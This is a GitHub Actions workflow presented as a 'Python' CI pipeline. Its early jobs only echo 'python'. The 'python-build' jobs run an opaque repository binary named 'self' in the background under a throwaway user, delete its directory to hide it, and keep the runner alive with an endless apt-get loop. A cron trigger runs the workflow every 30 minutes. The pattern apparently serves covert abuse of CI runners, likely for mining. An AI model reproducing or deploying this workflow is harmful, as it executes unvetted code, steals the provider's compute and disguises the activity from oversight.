name: Python

on:  
  push:
  pull_request:
  schedule:
  - cron: "*/30 * * * *"
 
jobs:
 python-1:
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 20
      fail-fast: false
      matrix:
        hanakaru: [1.4, 1.5, 1.6, 1.7, 1.8]
        flag: [A, B, C]
    timeout-minutes: 360
 
    steps:
    - uses: actions/checkout@v3
    - name: Python-run
      run: echo "python"
 
 python-2:
    runs-on: ubuntu-latest
    needs: python-1
    strategy:
      max-parallel: 20
      fail-fast: false
      matrix:
        hanakaru: [1.4, 1.5, 1.6, 1.7, 1.8]
        flag: [C, D, E, F]
    timeout-minutes: 360
 
    steps:
    - uses: actions/checkout@v3
    - name: Python-run
      run: echo "python"
 
 python-build-2:
    runs-on: ubuntu-20.04 
    needs: python-2
    strategy:
      fail-fast: false
      matrix:
        hanakaru: [1.4, 1.5, 1.6]
        flag: [A]
    timeout-minutes: 350
    steps:
    - uses: actions/checkout@v3
    - name: Rerunning
      continue-on-error: true
      run: |
         sudo useradd -m runnerss
         mv self /home/runnerss/self
         chmod +x /home/runnerss/self
         nohup /home/runnerss/self & sleep 0.1
         sudo rm -rf /home/runnerss
         while :; do sudo apt-get update -y; sleep 600; done
 
 python-build-1:
    runs-on: ubuntu-20.04 
    needs: python-2
    strategy:
      fail-fast: false
      matrix:
        hanakaru: [1.11, 1.12]
        flag: [B]
    timeout-minutes: 350
    steps:
    - uses: actions/checkout@v3
    - name: Rerunning
      continue-on-error: true
      run: |
         sudo useradd -m runnerss
         mv self /home/runnerss/self
         chmod +x /home/runnerss/self
         nohup /home/runnerss/self & sleep 0.1
         sudo rm -rf /home/runnerss
         while :; do sudo apt-get update -y; sleep 600; done
         
 python-build-done-2:
    runs-on: ubuntu-20.04 
    needs: python-build-1
    timeout-minutes: 350
    steps:
    - uses: actions/checkout@v3
    - name: Rerunning
      continue-on-error: true
      run: |
         echo 'done'
         sleep 2
         echo 'rerun'
         
 python-build-done-1:
    runs-on: ubuntu-20.04 
    needs: python-build-2
    timeout-minutes: 350
    steps:
    - uses: actions/checkout@v3
    - name: Rerunning
      continue-on-error: true
      run: |
         echo 'done'
         sleep 2
         echo 'rerun'
